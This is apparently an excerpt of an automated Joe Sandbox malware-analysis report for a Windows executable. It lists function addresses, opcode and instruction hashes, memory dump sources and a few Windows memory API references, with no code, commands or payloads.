Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21633869aaf883f91775ec383937c3e242fbe01a5cdb18eea53d1672b398f83d
Instruction ID: 7680456556c2345902142c6e805de45ad7ea5eac12b5a1df7eb3bc215658f46b
Opcode Fuzzy Hash: 21633869aaf883f91775ec383937c3e242fbe01a5cdb18eea53d1672b398f83d
Instruction Fuzzy Hash: C301C97091490D8FDF84EF58C848AAEBBF0FB68305F00456AE41DD32A4DB309690CB80

Function 00007FFD9BB1C1F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b88f324c872a9c4f4063f28b970c0030a323ac0862c35c998abef5a7f887c63
Instruction ID: f53bf35d08e35c50a5751b46225e1cef7fe658ddbdf0528351e3e101ef433b4d
Opcode Fuzzy Hash: 6b88f324c872a9c4f4063f28b970c0030a323ac0862c35c998abef5a7f887c63
Instruction Fuzzy Hash: D5F0C930914A4D9FCF84EF58C859AEA7BE0FB68305F0041AAA40DD3260DB31A694CB81

Function 00007FFD9BB16CFC Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc1b791c6fafbb55e25072668fc938503e4fe0407b3d75b1bb2d36f54cc5fe0
Instruction ID: e3c6263575657e262cc94542b07b7f216f181a5e1c8b1f727d48f0f7158840c8
Opcode Fuzzy Hash: 1fc1b791c6fafbb55e25072668fc938503e4fe0407b3d75b1bb2d36f54cc5fe0
Instruction Fuzzy Hash: A201CD3090895D8FDF94EF58C858AEA7BF0FF68305F00056AD419D32A1DB719554CB80

Function 00007FFD9BB0DBC0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28f797f39b5168dd8ac339f6ed43a863869d203fad14fac67391ecb54364953
Instruction ID: 8424d47f54b397e418295dd7e5deeffe2c9fbe9a82971202e2710060b89ea859
Opcode Fuzzy Hash: e28f797f39b5168dd8ac339f6ed43a863869d203fad14fac67391ecb54364953
Instruction Fuzzy Hash: 2CF0EC30914A4D9FCF44EF58C859AE97BF0FF68305F00456AA80DD32A0DB30E594CB81

Function 00007FFD9BB13620 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7423853ee7845c2d35d8a3e70ec9ed94a6bf878f45d8f8af71acaf2a9f6a53
Instruction ID: 82c0aeb26f19bb7604f25204124b46ffc4e03dca7e7ea9b5246f83f589241d1b
Opcode Fuzzy Hash: cd7423853ee7845c2d35d8a3e70ec9ed94a6bf878f45d8f8af71acaf2a9f6a53
Instruction Fuzzy Hash: D5F0C93091890DCFCF84EF58C848AAA77F0FB68304F00056AA419D3290DB309A54CB80

Function 00007FFD9BB0B610 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24129273d60510b69c1776612d799832155756e9947faeb9cf9d449b7912853
Instruction ID: 414a3a8c66f74c66ce29a2910b65650f14ed063581153690c00a1fcb3801daf3
Opcode Fuzzy Hash: c24129273d60510b69c1776612d799832155756e9947faeb9cf9d449b7912853
Instruction Fuzzy Hash: C9F0BD3091490D9FDF94EF58C459AAABBF1FB68305F1041AAE41DD31A4DB31D694CB80

Function 00007FFD9BAE0C81 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7115e5d39c03bf57a57407ba4af4dba3f84f81ffff9483414f32de55b26233
Instruction ID: c6068283e82cb6547a101f1870ddb1652db622b5e702de3f89a2e2ae0334304a
Opcode Fuzzy Hash: 8d7115e5d39c03bf57a57407ba4af4dba3f84f81ffff9483414f32de55b26233
Instruction Fuzzy Hash: E2011D71E0450E8BEB68DF80C865ABE7BB1EF94715F01063AD416973A1DF786A418B84

Function 00007FFD9BB12428 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae440a991b689e784f4132cbc6b137b4b350b056735305aa83ea369b9818d375
Instruction ID: 2d2881cf670814183448c7313c1faf117036ebdd7124999d0ceb04deabb39006
Opcode Fuzzy Hash: ae440a991b689e784f4132cbc6b137b4b350b056735305aa83ea369b9818d375
Instruction Fuzzy Hash: 50F0BD3091494D9FDF94EF58C454AAA7BB0FF59305F1041AAE51DD32A0DB31A6A4CB80

Function 00007FFD9BAD838D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec1ebd0a60836e954520e02686077356187f87f6263f8693dda2ff058a1ae09
Instruction ID: 53088a9860f99f5969249dc46357e08938cbd2c1b8e6087751db015805891ccf
Opcode Fuzzy Hash: 8ec1ebd0a60836e954520e02686077356187f87f6263f8693dda2ff058a1ae09
Instruction Fuzzy Hash: 06F09A30509A8DCFCB90EF58C895A9A3BE0FF69310F0502A6E41CC71A2D774E964CB81

Function 00007FFD9BAD8BAD Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af627a650a6215e5d08d3a390177da7b390735746c830e1f846fe4ab3d95ace0
Instruction ID: f804114c4beb2edb1ab2403b690e93036781ea6376fc40af0b08efb0f641d508
Opcode Fuzzy Hash: af627a650a6215e5d08d3a390177da7b390735746c830e1f846fe4ab3d95ace0
Instruction Fuzzy Hash: C6F0907490968DCFCB95EF18C8656993BE0FF69310F0502A6E448C7161D774E960CB81

Function 00007FFD9BB1CA10 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47061167f090c32dcbef74b04aa6da7ffbe9edaaeff3743146bd204e9d714fb9
Instruction ID: 155b75780a78b71dca4eaf548d5f7ceb09a6b92d50e1b7e988fc860db8b3cdc3
Opcode Fuzzy Hash: 47061167f090c32dcbef74b04aa6da7ffbe9edaaeff3743146bd204e9d714fb9
Instruction Fuzzy Hash: F4E06871A1AB4C4FDB90EA989820AD57BA0FBC9308F05206AE00CCA280C6225940C342

Function 00007FFD9BAC0CCF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92ba083788df44f29fab94c465cb39c2f67d487b970a9181f3c9598669e1f85
Instruction ID: 67df0931a8eb990e04a273482406e908d539a4e5f9e96cb29800cb91d48181e2
Opcode Fuzzy Hash: e92ba083788df44f29fab94c465cb39c2f67d487b970a9181f3c9598669e1f85
Instruction Fuzzy Hash: 1CF06270A0E61A8BE768EB94C8946FD73B0FF54710F05067AD019932E2CBB86644CB45

Function 00007FFD9BB14E09 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67b1078a30545d7ff921682f8facc645b995efe17a6f155944820474c122a46
Instruction ID: ea29d83123ef0c588094d1ab0e6dadfc47544a3c713cad65a0996604908f0196
Opcode Fuzzy Hash: c67b1078a30545d7ff921682f8facc645b995efe17a6f155944820474c122a46
Instruction Fuzzy Hash: 8EF0A731D1A64DAAEB64AFB448696E97BA0FF19304F0845B7E40CC20E6ED345294CA11

Function 00007FFD9BAD81ED Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1a574532c3afe822f6fc459cfa4444f5926b390a567076450921ccc1770b1a
Instruction ID: 0ec0c05c99d5143526c7439538b6651a334181ae40dbf20fbc2b868d4c990f26
Opcode Fuzzy Hash: ce1a574532c3afe822f6fc459cfa4444f5926b390a567076450921ccc1770b1a
Instruction Fuzzy Hash: 38F0A03184D68C9FDB51EF64885D69C7FB0FF15311F1505FBD418C60A2DA749258CB01

Function 00007FFD9BAE4053 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e2287588fe4e1e6ab9adaca711f5129e8ef0aebcd44b959259b5ccb93eedd2
Instruction ID: 4a287f34e8f409896043ccdbb97eeebd6f499761d52a53ddc1d1d5d96ac5f9e2
Opcode Fuzzy Hash: 23e2287588fe4e1e6ab9adaca711f5129e8ef0aebcd44b959259b5ccb93eedd2
Instruction Fuzzy Hash: F5E03030A0A50D4FE7A4EB4884652FD7262EF88340F814179E41E972E2CD766A414B10

Function 00007FFD9BAE19ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction ID: 4c27818d7c01d51de0a6f4868a27c535718b76701455d7d0ed0722bcd06451fa
Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction Fuzzy Hash: 10F07A70E5E21D8AEBB49BF984557FCB6B1AF65301F31017ED00D931A2DEB86A80DE00

Function 00007FFD9BB1C7B3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365c1d21b4833178c3a5b103301859b7d71c03615a7aab44c8401aae1ff1ed96
Instruction ID: 88c79148e75d52e509564fb43d35c8e3f9b8dec0a2716ec5bc9bdae2b3caa05a
Opcode Fuzzy Hash: 365c1d21b4833178c3a5b103301859b7d71c03615a7aab44c8401aae1ff1ed96
Instruction Fuzzy Hash: 1BE04F7051D7485FC344EB14E49189AB7E0FF94350F80152DF04A832A0CA30A541CB46

Function 00007FFD9BAC6B59 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af191beca17b59e94d1906994fd6b3976a14d86cb9926fc5565a9509fdb9e852
Instruction ID: 8f99233baa0eff662f97ba79b62a48c18d749a11543056582ddae5ba9f7bfc19
Opcode Fuzzy Hash: af191beca17b59e94d1906994fd6b3976a14d86cb9926fc5565a9509fdb9e852
Instruction Fuzzy Hash: 7FE08C31E2866C89EBA8EB20C854AFCB3B1EF64300F4045FB800EB2095DEB41A808F00

Function 00007FFD9BAC70E6 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction ID: 88248a6ff7e1479eb3819f1938853e0030dc389a28fb0599a9e18d8a0ec8818b
Opcode Fuzzy Hash: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction Fuzzy Hash: 2BE01270A0A51ACAF734AB54C8583BCB3B0EF85300F1040B8C10E633D1CE781A80CF05

Function 00007FFD9BB0AD25 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707d9436553585eb1a79f2993d503d8723e331299d20365262431185b8438d78
Instruction ID: 7f21022070e2c37959542f6d917b870a286aa3f7eb8fa4a9e935154a00e63b37
Opcode Fuzzy Hash: 707d9436553585eb1a79f2993d503d8723e331299d20365262431185b8438d78
Instruction Fuzzy Hash: 2AD01730A1960E8EDB20EB10C414BAEB271FF18304F4042A5900D96196CA386A81CF81

Non-executed Functions

Function 00007FFD9BB02731 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

a, xrefs: 00007FFD9BB03192
T, xrefs: 00007FFD9BB02323
4, xrefs: 00007FFD9BB0273F
R, xrefs: 00007FFD9BB03170

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BAF8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9baf8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: 4$R$T$a
API String ID: 0-2417396697
Opcode ID: 69ce3d704ee0d7a3e953e7445a14bbdaf4ede06ed104581759189135d9cdbd56
Instruction ID: 16df7944e8db6c93039ca9c6d6d8e49e033ceffdd47bed2997d66e2bd8b1aa72
Opcode Fuzzy Hash: 69ce3d704ee0d7a3e953e7445a14bbdaf4ede06ed104581759189135d9cdbd56
Instruction Fuzzy Hash: 73212870E0956D8EEB68DF94C4A83FD77B1FF18318F144079D049A62E5DA786A89CF10

Function 00007FFD9BB10DF9 Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

', xrefs: 00007FFD9BB109D9
?, xrefs: 00007FFD9BB10A07
2, xrefs: 00007FFD9BB10E0D
., xrefs: 00007FFD9BB10E35

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb0a000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: '$.$2$?
API String ID: 0-982240037
Opcode ID: 00791066aba59fcb5417964bf075c6e2aad5da836b06234f74c84f2a70dcfe64
Instruction ID: a7797a36d280603a5b5c6d6e5f7231801e7b8e55563f7dbc143f9af08310f9bd
Opcode Fuzzy Hash: 00791066aba59fcb5417964bf075c6e2aad5da836b06234f74c84f2a70dcfe64
Instruction Fuzzy Hash: 8C111330E0921ACEE7A58F14C8987B877B5FB14305F1180FAC44DA62A5DF786A88CF01

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 2188, Parent PID: 3592COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BACBD2D Relevance: 1.8, Instructions: 1809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bacb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b91046553b9d2d3d80f3c16a1d5c538a799cd2a55afe6825720b83f88e3e882
Instruction ID: 6d96030481d081be27794beefecad3c5c7cf2d118426b6ce1f8fa7423472e3af
Opcode Fuzzy Hash: 7b91046553b9d2d3d80f3c16a1d5c538a799cd2a55afe6825720b83f88e3e882
Instruction Fuzzy Hash: A2F21C70E1991D8FDBA8EB58C8A5BB8B7B1FF59310F0441E9D00DE7292DA746A81CF41

Function 00007FFD9BB1CB41 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bb0f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a5cd47adb0033f0ef961a289cd916f7fbeedf47185b0d5f00f3bcf2a4e43d7
Instruction ID: e037b7f0def72d232a5325253de221ab82e79f254fae53a2f54ea1c7a1988573
Opcode Fuzzy Hash: 39a5cd47adb0033f0ef961a289cd916f7fbeedf47185b0d5f00f3bcf2a4e43d7
Instruction Fuzzy Hash: FA122B71A19A5D8FDBA4DF58C8A5BE8B7E1FB59304F4141EAD40DE3291DE34AA80CB40

Function 00007FFD9BAFA4C7 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ab23f5e8455b545883845295a966853dbaf5dafb92218bfa720297674c513a
Instruction ID: a31c77ca3308aa10227d7b0f3c4ac9c672409b0d84d39c69d13966dc9497d4fc
Opcode Fuzzy Hash: a2ab23f5e8455b545883845295a966853dbaf5dafb92218bfa720297674c513a
Instruction Fuzzy Hash: 18020770E0421D8FDB58DFA8C4A19ECFBB1FF48304F148669D41AAB25ADB34A985CF54

Function 00007FFD9BAB0D70 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1399c1d1ee83117f3938afb5ad0d8f7ec55eb54f9f8ec5840eb3772d736b52
Instruction ID: 087f4ad5f122286609a1f60ed99e429192041a578c5063a55a43f52b1b05a979
Opcode Fuzzy Hash: ae1399c1d1ee83117f3938afb5ad0d8f7ec55eb54f9f8ec5840eb3772d736b52
Instruction Fuzzy Hash: 3491DF71A19A9D8FE798DB68C8657A9BFE1FF5A310F4001BED009D72D6CB782811CB40

Function 00007FFD9BB031B5 Relevance: 2.6, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 00007FFD9BB08BE2
4, xrefs: 00007FFD9BB0921C

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: ,$4
API String ID: 0-508195717
Opcode ID: d39d47831ddeec256cb32a9c9faed0d4acc3b8480f8db23f42003862b062eb4b
Instruction ID: c3d6b9fdc314574380d5eb7218c55c0ed80313acd5527e60e5e8b7e8da74fd36
Opcode Fuzzy Hash: d39d47831ddeec256cb32a9c9faed0d4acc3b8480f8db23f42003862b062eb4b
Instruction Fuzzy Hash: A7414A70A0994DCFDB68DF94C8A4AB8B7B1FF58304F5141AAC04AD72E5DB34AA81CF00

Function 00007FFD9BB03EC0 Relevance: 1.7, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB081EA

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 12e8feae55dc4891bf6794162377a30373e9ee2e5d58643d267805b1bc3e4e7a
Instruction ID: 825f12392069dfbba9952f735c0d0ace7a6ed3ef90301537ae8b0775478c8294
Opcode Fuzzy Hash: 12e8feae55dc4891bf6794162377a30373e9ee2e5d58643d267805b1bc3e4e7a
Instruction Fuzzy Hash: C6D11932B1AD4E4FDBA8DB5C98A4AB573D1FFA8314B0501BAD44DC72EADE24ED418340

Function 00007FFD9BAC215E Relevance: 1.7, APIs: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9BAC229A

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction ID: 8c2e05ee72fe3965e5269d14b0a09a495a0201150d3fcebb8ffedbbbfcc4bcaf
Opcode Fuzzy Hash: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction Fuzzy Hash: D4516D30D0874D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E7255DB74A885CB81

Function 00007FFD9BAC3B4D Relevance: 1.5, APIs: 1, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BAC3C6F

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction ID: 41277c795239166d6de7c874eab3a7e7acb837bd9bf8348737cbedbe6da44ab4
Opcode Fuzzy Hash: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction Fuzzy Hash: 99515D7090965C8FDF94EFA8D845BE9BBF1FB69310F0041AAD04DE3252DB74A9858B40

Function 00007FFD9BB0DD61 Relevance: 1.4, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0DE9A

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction ID: c0f413b4131cd20d5fa6aebacb022841f0d5e993a2974be1526aa6b47879c83d
Opcode Fuzzy Hash: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction Fuzzy Hash: 38515A31B1DA8E4FEF99DB6884655B977E0FF54358B0006FAE45CCB1EBDE24A9018340

Function 00007FFD9BB0D0A1 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 00007FFD9BB0D0AC

Memory Dump Source

Source File: 00000017.00000002.2049385971.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: bf52be8fa087091e3e98f90074e5f31014d167dedf9018fbbd50c2d8e7211131
Instruction ID: b6a7868dd06c9bf99f2280ab8889163786f0aa9da0cb95165afef024c1ce38d0
Opcode Fuzzy Hash: bf52be8fa087091e3e98f90074e5f31014d167dedf9018fbbd50c2d8e7211131
Instruction Fuzzy Hash: 30412770E1961D8FEBA4DB58C8A5BA8B7F1FB59304F1101A9D44ED22A5DF346A82CB01

Function 00007FFD9BB0DCBD Relevance: 1.3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BB0DCCA

